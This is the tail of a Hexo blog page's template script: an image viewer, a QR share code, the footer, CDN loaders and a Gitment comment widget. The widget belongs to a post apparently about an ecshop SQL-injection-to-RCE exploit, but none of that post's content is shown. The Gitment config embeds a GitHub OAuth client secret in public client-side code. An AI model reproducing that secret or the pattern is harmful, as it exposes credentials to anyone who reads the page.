      if (src !== 'http://file.muyutech.com/error-img.png') {
        var imageW = $(this).width()
        var imageH = $(this).height()
        
        var zoom = ($(window).width() * 0.95 / imageW).toFixed(2)
        zoom = zoom < 1 ? 1 : zoom
        zoom = zoom > 2 ? 2 : zoom
        var transY = (($(window).height() - imageH) / 2).toFixed(2)

        $('body').append('<div class="image-view-wrap"><div class="image-view-inner"><img src="'+ src +'" /></div></div>')
        $('.image-view-wrap').addClass('wrap-active')
        $('.image-view-wrap img').css({
          'width': `${imageW}`,
          'transform': `translate3d(0, ${transY}px, 0) scale3d(${zoom}, ${zoom}, 1)`
        })
        $('html').css('overflow', 'hidden')

        $('.image-view-wrap').on('click', function() {
          $(this).remove()
          $('html').attr('style', '')
        })
      }
    })

    // qrcode
    var qr = new QRious({
      element: document.getElementById('share-qrcode'),
      value: document.location.href
    });

    // gitment
    var gitmentConfig = "whip1ash";
    if (gitmentConfig !== 'undefined') {
      var gitment = new Gitment({
        id: "从SQLi到RCE -- ecshop 2.x/3.x无限制getshell",
        owner: "whip1ash",
        repo: "whip1ash.github.io",
        oauth: {
          client_id: "ae16d933c78b6cc642c8",
          client_secret: "e9045e51de8f846b89b22e347cd34d1fe345c533"
        },
        theme: {
          render(state, instance) {
            const container = document.createElement('div')
            container.lang = "en-US"
            container.className = 'gitment-container gitment-root-container'
            container.appendChild(instance.renderHeader(state, instance))
            container.appendChild(instance.renderEditor(state, instance))
            container.appendChild(instance.renderComments(state, instance))
            container.appendChild(instance.renderFooter(state, instance))
            return container;
          }
        }
      })
      gitment.render(document.getElementById('comments'))
    }
  })();
</script>

    <div class="scroll-top">
  <span class="arrow-icon"></span>
</div>
    <footer class="app-footer">
  <p class="copyright">
    &copy; 2018 | Proudly powered by <a href="https://hexo.io" target="_blank">Hexo</a>
    <br>
    Theme by <a href="https://github.com/yanm1ng">yanm1ng</a>
  </p>
</footer>

<script>
  function async(u, c) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }
</script>
<script>
  async("//cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function(){
    FastClick.attach(document.body);
  })
</script>

<script>
  var hasLine = 'true';
  async("//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js", function(){
    $('figure pre').each(function(i, block) {
      var figure = $(this).parents('figure');
      if (hasLine == 'false') {
        figure.find('.gutter').hide();
      }
      var lang = figure.attr('class').split(' ')[1] || 'code';
      var codeHtml = $(this).html();
      var codeTag = document.createElement('code');
      codeTag.className = lang;
      codeTag.innerHTML = codeHtml;
      $(this).attr('class', '').empty().html(codeTag);
      figure.attr('data-lang', lang.toUpperCase());
      hljs.highlightBlock(block);
    });
  })
</script>
<!-- Baidu Tongji -->

<script src="/js/script.js"></script>
  </body>
</html>